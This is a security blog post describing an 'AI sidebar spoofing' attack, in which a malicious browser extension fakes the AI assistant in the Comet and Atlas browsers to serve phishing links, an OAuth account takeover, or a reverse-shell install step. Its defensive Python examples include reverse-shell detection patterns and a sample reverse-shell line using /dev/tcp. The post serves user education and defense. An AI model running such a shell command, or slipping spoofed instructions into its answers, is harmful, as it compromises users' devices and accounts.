Cybersecurity researchers have revealed a new attack method targeting AI browsers, which they refer to as AI sidebar spoofing. This attack exploits users’ growing habit of blindly trusting instructions they get from artificial intelligence. The researchers successfully carried out AI sidebar spoofing against two popular AI browsers: Comet by Perplexity and Atlas by OpenAI.

Initially, the researchers used Comet for their experiments, but later confirmed that the attack was viable in the Atlas browser as well. This post uses Comet as an example when explaining the mechanics of AI sidebar spoofing, but we urge the reader to remember that everything stated below also applies to Atlas.

How do AI browsers work?

To begin, let’s wrap our heads around AI browsers. The idea of artificial intelligence replacing, or at least transforming, the familiar process of browsing the internet began to generate buzz between 2023 and 2024. The same period saw the first-ever attempts to integrate AI into online searches.

Initially, these were supplementary features within conventional browsers, such as Microsoft Edge Copilot and Brave Leo, implemented as AI sidebars. They added built-in assistants to the browser interface for summarizing pages, answering questions, and navigating sites. By 2025, the evolution of this concept ushered in Comet from Perplexity AI, the first browser designed for user-AI interaction from the ground up.

This made artificial intelligence the centerpiece of Comet’s user interface, rather than just an add-on. It unified search, analysis, and work automation into a seamless experience. Shortly thereafter, in October 2025, OpenAI launched its own AI browser, Atlas, which was built around the same concept.



Comet’s primary interface element is the input bar in the center of the screen, through which the user interacts with the AI. It’s the same with Atlas.

The home screens of Comet and Atlas demonstrate a similar concept: a minimalist interface with a central input bar and built-in AI that becomes the primary method of interacting with the web.



Furthermore, AI browsers allow users to engage with the artificial intelligence right on the web page. They do this through a built-in sidebar that analyzes content and handles queries, all without having the user leave the page. The user can ask the AI to summarize an article, explain a term, compare data, or generate a command while remaining on the current page.

The sidebars in both Comet and Atlas allow users to query the AI without navigating to separate tabs: you can analyze the current site, and ask questions and receive answers within the context of the page you’re on.

This level of integration conditions users to take the answers and instructions provided by the built-in AI for granted. When an assistant is seamlessly built into the user interface and feels like a natural part of the system, most people rarely stop to double-check the actions it suggests.

This trust is precisely what the attack demonstrated by the researchers exploits. A fake AI sidebar can issue false instructions, directing the user to execute malicious commands or visit phishing websites.

How did the researchers manage to execute the AI sidebar spoofing attack?



The attack begins with the user installing a malicious extension. To do its evil deeds, it needs permissions to view and modify data on all visited sites, as well as access to the client-side data storage API.

All of these are quite standard permissions; without the first one, no browser extension will work at all. Therefore, the chances that the user will get suspicious when a new extension requests these permissions are virtually zero. You can read more about browser extensions and the permissions they request in our post Browser extensions: more dangerous than you think.
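To make the permissions described above more concrete, here is a minimal Python sketch that inspects an extension manifest and flags the combination of all-site access and storage access. The `permissions`, `host_permissions`, and `content_scripts` keys and the `<all_urls>` match pattern are standard Chrome extension manifest fields. The function name, the list of broad patterns, and the sample manifest are assumptions made for this illustration and are not taken from the research.

```python
import json

# Match patterns that grant access to every site (assumed list for this sketch).
BROAD_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def audit_manifest(manifest: dict) -> list[str]:
    """Return human-readable warnings for broad permissions in a manifest."""
    warnings = []

    # Manifest V3 lists host patterns under "host_permissions";
    # Manifest V2 mixes them into "permissions".
    declared = set(manifest.get("permissions", []))
    declared |= set(manifest.get("host_permissions", []))

    # Content scripts can also be injected into every page via "matches".
    for script in manifest.get("content_scripts", []):
        declared |= set(script.get("matches", []))

    if declared & BROAD_PATTERNS:
        warnings.append("can read and change data on all websites")
    if "storage" in declared:
        warnings.append("can use the extension storage API")
    return warnings


# Hypothetical manifest; only the extension name comes from the article.
sample = json.loads("""
{
  "name": "AI Marketing Tool",
  "manifest_version": 3,
  "permissions": ["storage"],
  "host_permissions": ["<all_urls>"]
}
""")

for warning in audit_manifest(sample):
    print("Warning:", warning)
```

A warning here doesn’t prove that an extension is malicious, since plenty of legitimate extensions request the same access. It only shows how little the permission list alone tells the user.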

A list of installed extensions in the Comet user interface. The disguised malicious extension, AI Marketing Tool, is visible among them. Source

Once installed, the extension injects JavaScript into the web page and creates a counterfeit sidebar that looks strikingly like the real thing. This shouldn’t raise any red flags with the user: when the extension receives a query, it talks to the legitimate LLM and faithfully displays its response. The researchers used Google Gemini in their experiments, though OpenAI’s ChatGPT likely would have worked just as well.

The screenshot shows an example of a fake sidebar that’s visually similar to the original Comet Assistant. Source

The fake sidebar can selectively manipulate responses to specific topics or key queries set in advance by the potential attacker. This means that in most cases, the extension will simply display legitimate AI responses, but in certain situations it will display malicious instructions, links, or commands instead.

How realistic is the scenario where an unsuspecting user installs a malicious extension capable of the actions described above? Experience shows it’s highly probable. On our blog, we’ve repeatedly reported on dozens of malicious and suspicious extensions that successfully make it into the official Chrome Web Store. This continues to occur despite all the security checks conducted by the store and the vast resources at Google’s disposal. Read more about how malicious extensions end up in official stores in our post 57 shady Chrome extensions clock up six million installs.

Consequences of AI sidebar spoofing

Now let’s discuss what attackers can use a fake sidebar for. As noted by the researchers, the AI sidebar spoofing attack offers potential malicious actors ample opportunities to cause harm. To demonstrate this, the researchers described three possible attack scenarios and their consequences: crypto-wallet phishing, Google account theft, and device takeover. Let’s examine each of them in detail.





Using a fake AI sidebar to steal Binance credentials

In the first scenario, the user asks the AI in the sidebar how to sell their cryptocurrency on the Binance crypto exchange. The AI assistant provides a detailed answer that includes a link to the crypto exchange. But this link doesn’t lead to the real Binance site: it takes the user to a remarkably convincing fake. The link points to the attacker’s phishing site, which uses the fake domain name binacee.

The fake login form on the domain login{.}binacee{.}com is nearly indistinguishable from the original, and is designed to steal user credentials. Source

Next, the unsuspecting user enters their Binance credentials and the code for two-factor authentication, if needed. After this, the attackers gain full access to the victim’s account and can siphon off all funds from their crypto wallets.
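The lookalike domain in this scenario differs from the real one by only a couple of characters, which is easy to miss by eye but simple to measure. The following Python sketch is one possible way to flag such links, assuming a short allowlist of domains the user actually intends to visit. The allowlist, the function names, the 0.8 similarity threshold, and the example URLs are all assumptions for illustration. The domain extraction is deliberately naive (it keeps the last two labels of the hostname), so a real tool would need the Public Suffix List instead.

```python
from difflib import SequenceMatcher
from urllib.parse import urlsplit

# Domains the user actually intends to visit (assumed allowlist for this sketch).
TRUSTED_DOMAINS = ["binance.com", "google.com"]


def registered_domain(url: str) -> str:
    """Naively keep the last two hostname labels, e.g. login.binacee.com -> binacee.com."""
    host = (urlsplit(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])


def classify_link(url: str, threshold: float = 0.8) -> str:
    """Return 'trusted', 'lookalike of <domain>', or 'unknown' for a URL."""
    domain = registered_domain(url)
    if domain in TRUSTED_DOMAINS:
        return "trusted"
    for trusted in TRUSTED_DOMAINS:
        # ratio() is 1.0 for identical strings and falls as they diverge.
        if SequenceMatcher(None, domain, trusted).ratio() >= threshold:
            return f"lookalike of {trusted}"
    return "unknown"


print(classify_link("https://www.binance.com/en/trade"))   # trusted
print(classify_link("https://login.binacee.com/signin"))   # lookalike of binance.com
print(classify_link("https://example.org/"))                # unknown
```

An “unknown” result is not a verdict of safety. It only means the domain is neither on the allowlist nor close to an entry on it.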



Using a fake AI sidebar to take over a Google account

The next attack variation also begins with a phishing link, in this case to a fake file-sharing service. If the user clicks the link, they’re taken to a website where the landing page prompts them to sign in with their Google account right away.

After the user clicks this option, they’re redirected to the legitimate Google login page to enter their credentials there, but then the fake platform requests full access to the user’s Google Drive and Gmail.

The fake application share-sync-pro{.}vercel{.}app requests full access to the user’s Gmail and Google Drive. This gives the attackers control over the account. Source

If the user fails to scrutinize the page and automatically clicks Allow, they grant attackers permissions for highly dangerous actions:

- Viewing their emails and settings.

- Reading, creating, and sending emails from their Gmail account.

- Viewing and downloading all the files they store in Google Drive.

This level of access gives the cybercriminals the ability to steal the victim’s files, use services and accounts linked to that email address, and impersonate the account owner to disseminate phishing messages.
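What makes this scenario dangerous is that the sign-in page is genuine, so the only warning sign is the list of permissions being requested. As a rough sketch, the Python snippet below reads the `scope` parameter from a Google OAuth consent URL and reports any scopes that grant broad access to mail or files. The scope strings are real Google API scopes with paraphrased descriptions, but the article doesn’t state which scopes the fake application requested, so the mapping, the function name, and the example URL with its client ID are assumptions.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Google OAuth scopes that grant broad access to mail and files.
# Which of these the fake app actually requested is an assumption.
HIGH_RISK_SCOPES = {
    "https://mail.google.com/": "read, compose, send, and permanently delete all Gmail messages",
    "https://www.googleapis.com/auth/gmail.modify": "read, compose, and send Gmail messages",
    "https://www.googleapis.com/auth/gmail.readonly": "view Gmail messages and settings",
    "https://www.googleapis.com/auth/drive": "see, edit, create, and delete all Google Drive files",
    "https://www.googleapis.com/auth/drive.readonly": "see and download all Google Drive files",
}


def risky_scopes(consent_url: str) -> dict[str, str]:
    """Map each high-risk scope found in an OAuth consent URL to its description."""
    query = parse_qs(urlsplit(consent_url).query)
    # The "scope" parameter holds a space-delimited list of scopes.
    requested = " ".join(query.get("scope", [])).split()
    return {s: HIGH_RISK_SCOPES[s] for s in requested if s in HIGH_RISK_SCOPES}


# Hypothetical consent URL built for the example.
example_url = "https://accounts.google.com/o/oauth2/v2/auth?" + urlencode({
    "client_id": "hypothetical-client-id",
    "response_type": "code",
    "scope": "openid "
             "https://www.googleapis.com/auth/gmail.modify "
             "https://www.googleapis.com/auth/drive.readonly",
})

for scope, meaning in risky_scopes(example_url).items():
    print(f"{scope}: {meaning}")
```

In practice the user sees these permissions as plain-language lines on the consent screen rather than as URLs. The point of the sketch is that a file-sharing service asking for mail access is a mismatch worth stopping for.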



Reverse shell initiated through a fake AI-generated utility installation guide

Finally, in the last scenario, the user asks the AI how to install a certain utility; the Homebrew utility was used in the example, but it could be anything. The sidebar shows the user a perfectly reasonable, AI-generated guide. All steps in it look plausible and correct up until the final stage, where the utility installation command is replaced with a reverse shell.

The guide for installing the utility as shown in the sidebar is almost entirely correct, but the last step contains a reverse shell command. Source

If the user follows the AI’s instructions by copying and pasting the malicious code into the terminal and then running it, their system will be compromised. The attackers will be able to download data from the device, monitor activity, or install malware and continue the attack. This scenario clearly demonstrates that a single replaced line of code in a trusted AI interface is capable of fully compromising a device.
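Because the harm comes from a single pasted line, even a crude check before running a command can help. The Python sketch below scans a command string for a few patterns commonly associated with reverse shells. The pattern list, the descriptions, and the function name are assumptions chosen for illustration, and the exact command used in the research isn’t reproduced here. The sample reverse shell uses an address from a range reserved for documentation.

```python
import re

# Heuristic patterns often seen in reverse shells or hidden payloads.
# The list is illustrative, not exhaustive.
SUSPICIOUS_PATTERNS = {
    r"/dev/(tcp|udp)/": "opens a raw network connection from the shell",
    r"\b(nc|ncat|netcat)\b.*\s-(e|c)\b": "netcat asked to run a program",
    r"\b(ba|z|k)?sh\s+-i\b": "starts an interactive shell",
    r"\bbase64\b.*(-d|--decode)\b.*\|\s*(ba|z)?sh\b": "decodes hidden text and runs it",
    r"\bmkfifo\b": "creates a named pipe, common in shell relays",
}


def review_command(command: str) -> list[str]:
    """Return the reasons a pasted command looks suspicious (empty if none match)."""
    return [reason for pattern, reason in SUSPICIOUS_PATTERNS.items()
            if re.search(pattern, command)]


# The installation command published on the Homebrew site.
homebrew = ('/bin/bash -c "$(curl -fsSL '
            'https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"')
# A textbook reverse shell pointed at a documentation-only address.
reverse_shell = "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"

for label, cmd in [("homebrew", homebrew), ("reverse shell", reverse_shell)]:
    print(label, "->", review_command(cmd) or "no known patterns")
```

An empty result doesn’t mean a command is safe: the genuine Homebrew installer itself downloads and runs a script, and an attacker could simply change the URL it points to. Treat a check like this as a prompt to look closer, not as a replacement for reading the command.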

How to avoid becoming a victim of fake AI sidebars

The AI sidebar spoofing attack scheme is currently only theoretical. However, in recent years attackers have been very quick to turn hypothetical threats into practical attacks. Thus, it’s quite possible that some malware creator is already hard at work on a malicious extension using a fake AI sidebar, or uploading one to an official extension store.

Therefore, it’s important to remember that even a familiar browser interface can be compromised. And even if instructions look convincing and come from the in-browser AI assistant, you shouldn’t blindly trust them. Here are some final tips to help you avoid falling victim to an attack involving fake AI:

- When using AI assistants, carefully check all commands and links before following the AI’s recommendations.

- If the AI recommends executing any programming code, copy it and find out what it does by pasting it into a search engine in a different, non-AI browser.

- Don’t install browser extensions, AI or otherwise, unless absolutely necessary. Regularly clean up and delete any extensions you no longer use.

- Before installing an extension, read the user reviews. Most malicious extensions rack up heaps of scathing reviews from duped users long before store moderators get around to removing them.

- Before entering credentials or other confidential information, always check that the website address doesn’t look suspicious or contain typos. Pay attention to the top-level domain, too: it should be the official one.

- Use Kaspersky Password Manager to store passwords. If it doesn’t recognize the site and doesn’t automatically offer to fill in the login and password fields, this is a strong reason to ask yourself if you might be on a phishing page.

- Install a reliable security solution that will alert you to suspicious activity on your device and prevent you from visiting a phishing site.
